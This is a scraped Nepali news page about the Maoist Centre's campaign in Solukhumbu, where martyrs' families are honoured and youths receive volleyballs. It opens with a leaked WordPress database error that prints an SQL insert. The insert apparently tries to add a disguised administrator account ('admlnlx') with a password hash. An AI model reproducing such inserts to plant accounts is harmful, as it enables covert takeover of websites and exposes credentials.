WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2frJM4Ure1iepbeHcdSA6/Oid3nqf/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 11:16:56', '', 'admlnlx', 'admlnlx')

जनतासँग माओवादी विशेष रुपान्तरण’ अभियान खुम्बुमा शहिद परिवारलाई सम्मान, युवालाई भलिबल – Gaule Khabar

जनतासँग माओवादी विशेष रुपान्तरण’ अभियान खुम्बुमा शहिद परिवारलाई सम्मान, युवालाई भलिबल

जनतासँग माओवादी विशेष रुपान्तरण’ अभियान खुम्बुमा शहिद परिवारलाई सम्मान, युवालाई भलिबल

सोलुखुम्बु । सोलुखुम्बुको विभिन्न वडामा विभिध कार्यक्रम गरि नेकपा माओवादी केन्द्रको तीन महिने पार्टी रुपान्तरण अभियान सुरु गरेकोछ । मंसिर १५ सम्म सञ्चालन हुने ‘जनतासँग माओवादी विशेष रुपान्तरण’ अभियानको आज माओवादी केन्द्रका अध्यक्ष एवम् प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डले एकैसाथ उद्घाटन गर्नुभएको छ ।

कार्यक्रम उद्घाटनको अवसरमा सोलुखुम्बु जिल्लामा विभिन्न रचनात्मक कार्यको सुरुवात गरिएको छ । अहिले माओवादी केन्द्रका नेताहरु टोलबस्तीमा पुगेका छन् ।

कार्यक्रमको अवसरमा प्रदेश समिति सचिवालय सदस्य तथा जिल्ला संयोजक असिम राईले खुम्बुपासाङ ल्हामु गाउँपालिकाका युवाहरुलाई भलिबल वितरण गर्नुका साथै शहिद परिवारलाई सम्मान तथा खाद्यन्न वितरण गर्नुभएको छ । वर्तमान व्यवस्था ल्याउनको लागि १० वर्षे जनयुद्ध, त्यसका नायक प्रधानमन्त्री तथा माओवादी केन्द्रका अध्यक्ष सहित युवा तथा शहिद परिवारको भुमिका महत्वपुर्ण रहेको भन्दै संयोजक राईले इतिहासलाई भुल्न नहुने बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका